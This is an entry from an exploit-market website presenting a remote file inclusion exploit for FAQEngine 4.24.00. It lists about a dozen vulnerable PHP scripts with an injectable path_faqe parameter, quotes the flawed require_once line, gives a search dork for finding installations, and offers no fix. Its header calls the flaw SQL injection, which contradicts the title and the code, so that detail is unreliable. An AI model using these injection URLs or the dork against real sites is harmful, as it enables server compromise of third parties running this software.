[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

FAQEngine 4.24.00 - Remote File Inclusion vulnerability

Author
kaMtiEz
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10661
Category
web applications
Date add
11-01-2010
Platform
unsorted
=======================================================
FAQEngine 4.24.00 - Remote File Inclusion vulnerability
=======================================================

###################################################################################
 
[ Software Information ]
 
[+] Vendor : http://www.boesch-it.de/
[+] Download : http://www.boesch-it.de/sw/faqengine.php?lang=en
[+] version : 4.24.00 or lower maybe also affected
[+] Vulnerability : SQL injection
[+] Dork : "Think iT"
[+] Price : -           
[+] Location : INDONESIA - JOGJA
 
##################################################################################
 
 
[ HERE WE GO .. LIVE FROM JOGJA CITY ]
 
[ Vulnerable File ]
 
http://127.0.0.1/[kaMtiEz]/attachs.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/backup.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/badwords.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/categories.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/changepw.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/colorchooser.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/colorwheel.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/dbfiles.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/diraccess.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/faq.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/index.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/kb.php?path_faqe=[INDONESIANCODER]
http://127.0.0.1/[kaMtiEz]/stats.php?path_faqe=[INDONESIANCODER]
 
etc etc etc .. too much ..
 
[ ERROR IN ]
 
require_once($path_faqe."/includes/global.inc.php");
 
[ FIX ]
 
dunno .. :P~~



#  0day.today [2024-12-24]  #